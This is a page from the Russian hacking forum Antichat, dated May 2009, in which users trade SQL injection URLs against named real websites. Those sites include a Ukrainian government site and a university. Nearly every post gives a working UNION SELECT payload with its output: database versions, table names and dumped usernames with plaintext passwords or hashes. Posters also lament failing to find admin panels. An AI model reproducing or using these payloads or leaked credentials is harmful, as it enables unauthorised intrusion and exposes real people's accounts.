ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9411  
Старый 18.05.2009, 15:49
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

ПР5
http://www.mainepolicy.org/news/show.php?news_id=-259+union+select+1,concat(username,char(58),passwo rd,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14+fr om+users/*&category=1
Админку не нашёл((

Последний раз редактировалось DezMond™; 18.05.2009 в 17:58..
 
Ответить с цитированием

  #9412  
Старый 18.05.2009, 20:28
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://glastonburytrust.co.uk/news_detail.php?pID=-8+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8

Database Version: 5.0.67-community
Database name: glastonb_db
User name: glastonb_db@localhost

In database glastonb_db found table users
1 : name
2 : email
3 : password
4 : status
5 : university
 
Ответить с цитированием

  #9413  
Старый 18.05.2009, 20:32
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

ПР4
http://brml.technion.ac.il/publications.php?id=-3+union+select+1,version(),3,4,5+/*+
4.1.22-log
 
Ответить с цитированием

  #9414  
Старый 18.05.2009, 22:38
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://pi.aq-central.com/roster.php?id=1+union+select+version()--

5.0.75-community-log

http://pi.aq-central.com/roster.php?id=1+union+select+group_concat(concat_w s (0x3a,usernam e,pass word))+from+use rs--

admin:admin,superJAYdude:baconbits1,Jason A. Churchill:888888,PositivePaul:FreeGeorgeSherrill,M arlin Man:Safari,DAMellen:dirtysocks


##############################################
PR 4

http://www.zeva.com.au/registry.php?id=-1'+u nion+select+1,2,3,4,5,versio n(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33+--+

5.0.67


http://www.zeva.com.au/registry.php?id=-1'+union+select+1,2,3,4,5,group_concat(table_name) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33+from+information_sche ma.tables+group+by+table_schema+limit+4,1+--+

через лимиты берем таблы

Последний раз редактировалось HAXTA4OK; 18.05.2009 в 23:11..
 
Ответить с цитированием

  #9415  
Старый 19.05.2009, 00:03
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.strawtec.com.au/content.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user name,password),10,11,12+from+users+--+&ch=FAQ
strawtecadmin:snowfall88
P.S. админка есть но пас не подходит((

http://www.austraumaconference.org/content.php?id=-2'+union+select+1,2,3,4,5,version()+--+
4.1.22
 
Ответить с цитированием

  #9416  
Старый 19.05.2009, 00:21
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.vnrhcs.org/news_detail.php?id=26+UNION+SELECT+1,2,3,4,5,6,7,8 ,9+limit+1,1/*

Database Version: 4.1.14-standard
Database name: vnr
User name: vnr@lsh209.chi.us.siteprotect.com
 
Ответить с цитированием

  #9417  
Старый 19.05.2009, 01:12
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.atriumtower.com/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--

1
4.0.27

2
 
Ответить с цитированием

  #9418  
Старый 19.05.2009, 02:21
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.ukurier.gov.ua/index.php?p=-4+union+select+1,concat_ws(0x3a,login,password),3+ from+users+limit+31,1&id=4

olgas:5b708c065dfab38528050a84d852bf13 pass : 10610
 
Ответить с цитированием

  #9419  
Старый 19.05.2009, 02:23
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://bender.samaratoday.ru/webpage.php?id=6+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT(Version(),Database(),User()),0x71),0x71 )+LIMIT+1,1/*

Database Version: 5.0.45-log
Database name: samaratoda_ben
User name: samaratoda_ben@localhost
 
Ответить с цитированием

  #9420  
Старый 19.05.2009, 08:54
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

PR5

http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,version(),6,7,8--

5.0.68-log

http://www.aica-italia.it/interna.php?idsez=-13+union+select+1,2,3,4,concat_ws(char(58),nome_ut ente,password),6,7,8+from+amministrazione--

ilias:4ea4bb924a73da2829c38c88b45eb85a
maria:b8fb37612c3cda3e341e12386a279b49
roberto:c6cc8094c2dc07b700ffcc36d64e2138

Не нашел админки(
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ